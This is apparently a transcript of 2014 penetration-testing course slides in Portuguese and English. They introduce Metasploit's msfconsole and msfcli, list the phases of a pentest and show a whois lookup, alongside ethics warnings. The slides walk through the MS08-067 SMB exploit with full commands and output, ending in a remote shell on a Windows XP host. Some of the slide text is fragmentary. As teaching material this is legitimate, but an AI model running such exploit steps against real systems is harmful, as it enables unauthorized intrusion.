Transcript root@bt:/opt/framework3/msf3# armitage

PENTEST
Cerutti – IESGF - 2014
Pentester antigo
• Facilidades pela novidade
• Departamentos não estavam preparados e...
• Acontecia facilmente:
Hoje...
Fases dos testes de PTEST
1.
2.
3.
4.
5.
6.
7.
Interações Pre-contratação
Acumulo de Inteligencia
Modelagem das ameaças
Análise das vulnerabilidades
Exploitation
Post Exploitation
Relatórios
Metasploit – explorando
vulnerabilidades
• 􀁺 Don’t be malicious.
• 􀁺 Don’t be stupid.
• 􀁺 Don’t attack targets without written
permission.
• 􀁺 Consider the consequences of your actions.
• 􀁺 If you do things illegally, you can be caught
and put in jail!
Metasploit
Starting MSFconsole
To launch msfconsole, enter msfconsole at the command line:
root@bt:/# cd /opt/framework3/msf3/
root@bt:/opt/framework/msf3# msfconsole
< metasploit >
-----------,__,
(oo)____
(__)
)\
||--|| *
msf >
To access msfconsole’s help files, enter help followed by the command
which you are interested in. In the next example, we are looking for help
for the command connect, which allows us to communicate with a host. The
resulting documentation lists usage, a description of the tool, and the various
option flags.
msf > help connect
msfcli
It is a fantastic tool for
unique exploitation when you know exactly which exploit and options you
need. It is less forgiving than msfconsole , but it offers some basic help (including
usage and a list of modes) with the command msfcli -h , as shown here:
root@bt:/opt/framework3/msf3# msfcli -h
Usage: /opt/framework3/msf3/msfcli <exploit_name> <option=value> [mode]
==================================================================
============
Mode Description
---- --------------(H)elp You're looking at it, baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
root@bt:/opt/framework3/msf3#
Sample Usage
root@bt:/# msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...
Name Current Setting Required Description
---- --------------- -------- ----------RHOST 0.0.0.0 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use
(BROWSER, SRVSVC)
You can see that the module requires three options: RHOST , RPORT , and
SMPIPE . Now, by adding a P , we can check for available payloads:
root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 P
[*] Please wait while we load the module tree...
Compatible payloads
===================
Name Description
---- ----------generic/debug_trap Generate a debug trap in the target process
generic/shell_bind_tcp Listen for a connection and spawn a command shell
Having set all the required options for our exploit and selecting a payload,
we can run our exploit by passing the letter E to the end of the msfcli
argument string, as shown here – PRÓXIMO SLIDE
PROMPT WINDOWS REMOTO
root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155
PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.101:46025 ->
192.168.1.155:4444)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
We’re successful,
Running Armitage
To launch armitage, run the command armitage. During startup, select
Start MSF, which will allow armitage to connect to your Metasploit
instance.
root@bt:/opt/framework3/msf3# armitage
Acumulando o reconhecimento do
ambiente
•
•
•
•
•
Atenção
Se você seguir os procedimentos aqui indicados voce
pode danificar seu sistema e o sistema alvo
Esteja certo de que o ambiente de testes e somente o
ambiente de testes, será usado.
Muitos exemplos são destrutivos e tornam o alvo
inutilizável
As atividades descritas aqui podem ser consideradas
ILEGAIS quando usadas ILICITAMENTE ou com más
intenções.
Siga as regras, não tente ser mais esperto que o cara
que irá rastrear teus passos depois do evento.
whois Lookups
msf > whois secmaniac.net
[*] exec: whois secmaniac.net
. . . tempo. . .
Intelligence Gathering 17
Registered through: GoDaddy.com, Inc.
(http://www.godaddy.com)
Domain Name: SECMANIAC.NET
Created on: 03-Feb-10
Expires on: 03-Feb-12
Last Updated on: 03-Feb-10
􀁺Domain servers in listed order:
NS57.DOMAINCONTROL.COM
NS58.DOMAINCONTROL.COM